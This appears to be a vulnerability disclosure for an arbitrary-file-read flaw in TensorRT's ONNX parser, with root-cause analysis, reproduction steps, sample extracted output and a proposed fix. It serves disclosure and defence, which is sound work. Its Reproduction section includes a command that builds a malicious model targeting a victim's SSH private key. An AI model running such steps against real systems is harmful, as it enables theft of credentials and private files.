
VULN-016: Arbitrary File Read via ONNX External Data Path Traversal in TensorRT

Vulnerability

TensorRT's ONNX parser (libnvonnxparser) allows absolute file paths in the external_data.location field of ONNX TensorProto initializers. When a victim loads a malicious ONNX model, arbitrary files from their filesystem are read as model weights and embedded into the compiled TensorRT engine.

CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Severity

Critical (CVSS 3.1: 9.1)

Root Cause

normalizePath() in weightUtils.cpp blocks relative traversal sequences (../) but does NOT reject absolute paths such as C:/Windows/win.ini or /etc/passwd. An absolute path therefore passes all validation and is handed directly to CreateFileMapping() (Windows) or mmap() (Linux).
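A minimal pure-Python demonstration of the flaw described above. The function name is hypothetical; it stands in for the behavior the report attributes to normalizePath(), which filters only "../" sequences:

```python
def naive_traversal_check(path: str) -> bool:
    """Return True if the path would be accepted by a filter that
    only rejects '../' sequences (the behavior described above)."""
    return "../" not in path

print(naive_traversal_check("weights/layer0.bin"))  # True: legitimate relative path
print(naive_traversal_check("../secrets.bin"))      # False: relative traversal blocked
print(naive_traversal_check("/etc/passwd"))         # True: absolute path slips through
print(naive_traversal_check("C:/Windows/win.ini"))  # True: drive-letter path slips through
```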

Affected Versions

  • TensorRT 10.16.0.29 (tested)
  • Likely all TensorRT versions with ONNX external data support

Impact

An attacker can craft a ~200-byte ONNX model that, when loaded by TensorRT:

  1. Reads arbitrary files from the victim's filesystem
  2. Embeds file contents into the compiled TensorRT engine
  3. Exposes stolen data through inference output

Attack scenarios: steal SSH keys, cloud credentials, application configs, proprietary models.

Files

File                        Description
poc_windows.onnx            PoC model targeting C:/Windows/win.ini (Windows)
poc_linux.onnx              PoC model targeting /etc/hostname (Linux)
reproduce.py                Reproduction script: loads a PoC model and extracts the stolen file contents
create_malicious_model.py   Tool to create custom malicious models targeting any file

Reproduction

# 1. Install requirements
pip install tensorrt numpy onnx

# 2. Run the PoC (Windows)
python reproduce.py poc_windows.onnx

# 3. Or create a custom exploit model
python create_malicious_model.py C:/Users/victim/.ssh/id_rsa exploit.onnx 4096
python reproduce.py exploit.onnx

Expected Output

[*] Loading model: poc_windows.onnx
[+] Parse succeeded - external file was read as model weights!
[+] Engine built - file contents now embedded in TensorRT engine
[+] Extracted 92 bytes from target file:
----------------------------------------
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
----------------------------------------

Verified Reads

Target File                        Result
C:/Windows/System32/kernel32.dll   Read successful (4096 bytes)
C:/Windows/System32/ntdll.dll      Read successful (4096 bytes)
C:/Windows/win.ini                 Read successful; byte-for-byte content match verified

Suggested Fix

In parseExternalWeights(), reject absolute paths:

std::string normalizedFile = normalizePath(file);
// Existing check: reject relative traversal sequences
if (normalizedFile.find("../") != std::string::npos) return false;
// ADD: reject POSIX absolute paths and UNC-style leading separators
if (!normalizedFile.empty() && (normalizedFile[0] == '/' || normalizedFile[0] == '\\'))
    return false;
// ADD: reject Windows drive-letter paths (e.g. "C:/...")
if (normalizedFile.size() > 1 && normalizedFile[1] == ':')
    return false;
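For tooling that pre-screens untrusted models before handing them to TensorRT, the same policy can be applied on the Python side. A sketch (the function name is mine, not a TensorRT or ONNX API):

```python
def is_safe_external_location(loc: str) -> bool:
    """Reject traversal and absolute paths in external_data 'location' values.

    Mirrors the suggested C++ check; separators are normalized first so
    Windows-style '..\\' traversal is caught as well.
    """
    norm = loc.replace("\\", "/")
    if ".." in norm.split("/"):           # any traversal component
        return False
    if norm.startswith("/"):              # POSIX absolute path
        return False
    if len(norm) > 1 and norm[1] == ":":  # Windows drive-letter path
        return False
    return True
```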

Related CVEs

  • CVE-2022-25882: ONNX library path traversal via external_data
  • CVE-2024-27318: Bypass of CVE-2022-25882 fix
  • CVE-2024-5187: ONNX path traversal via tar
  • CVE-2025-51480: ONNX save_external_data path traversal

TensorRT's C++ parser has its own independent implementation that does not inherit fixes from the ONNX Python library.
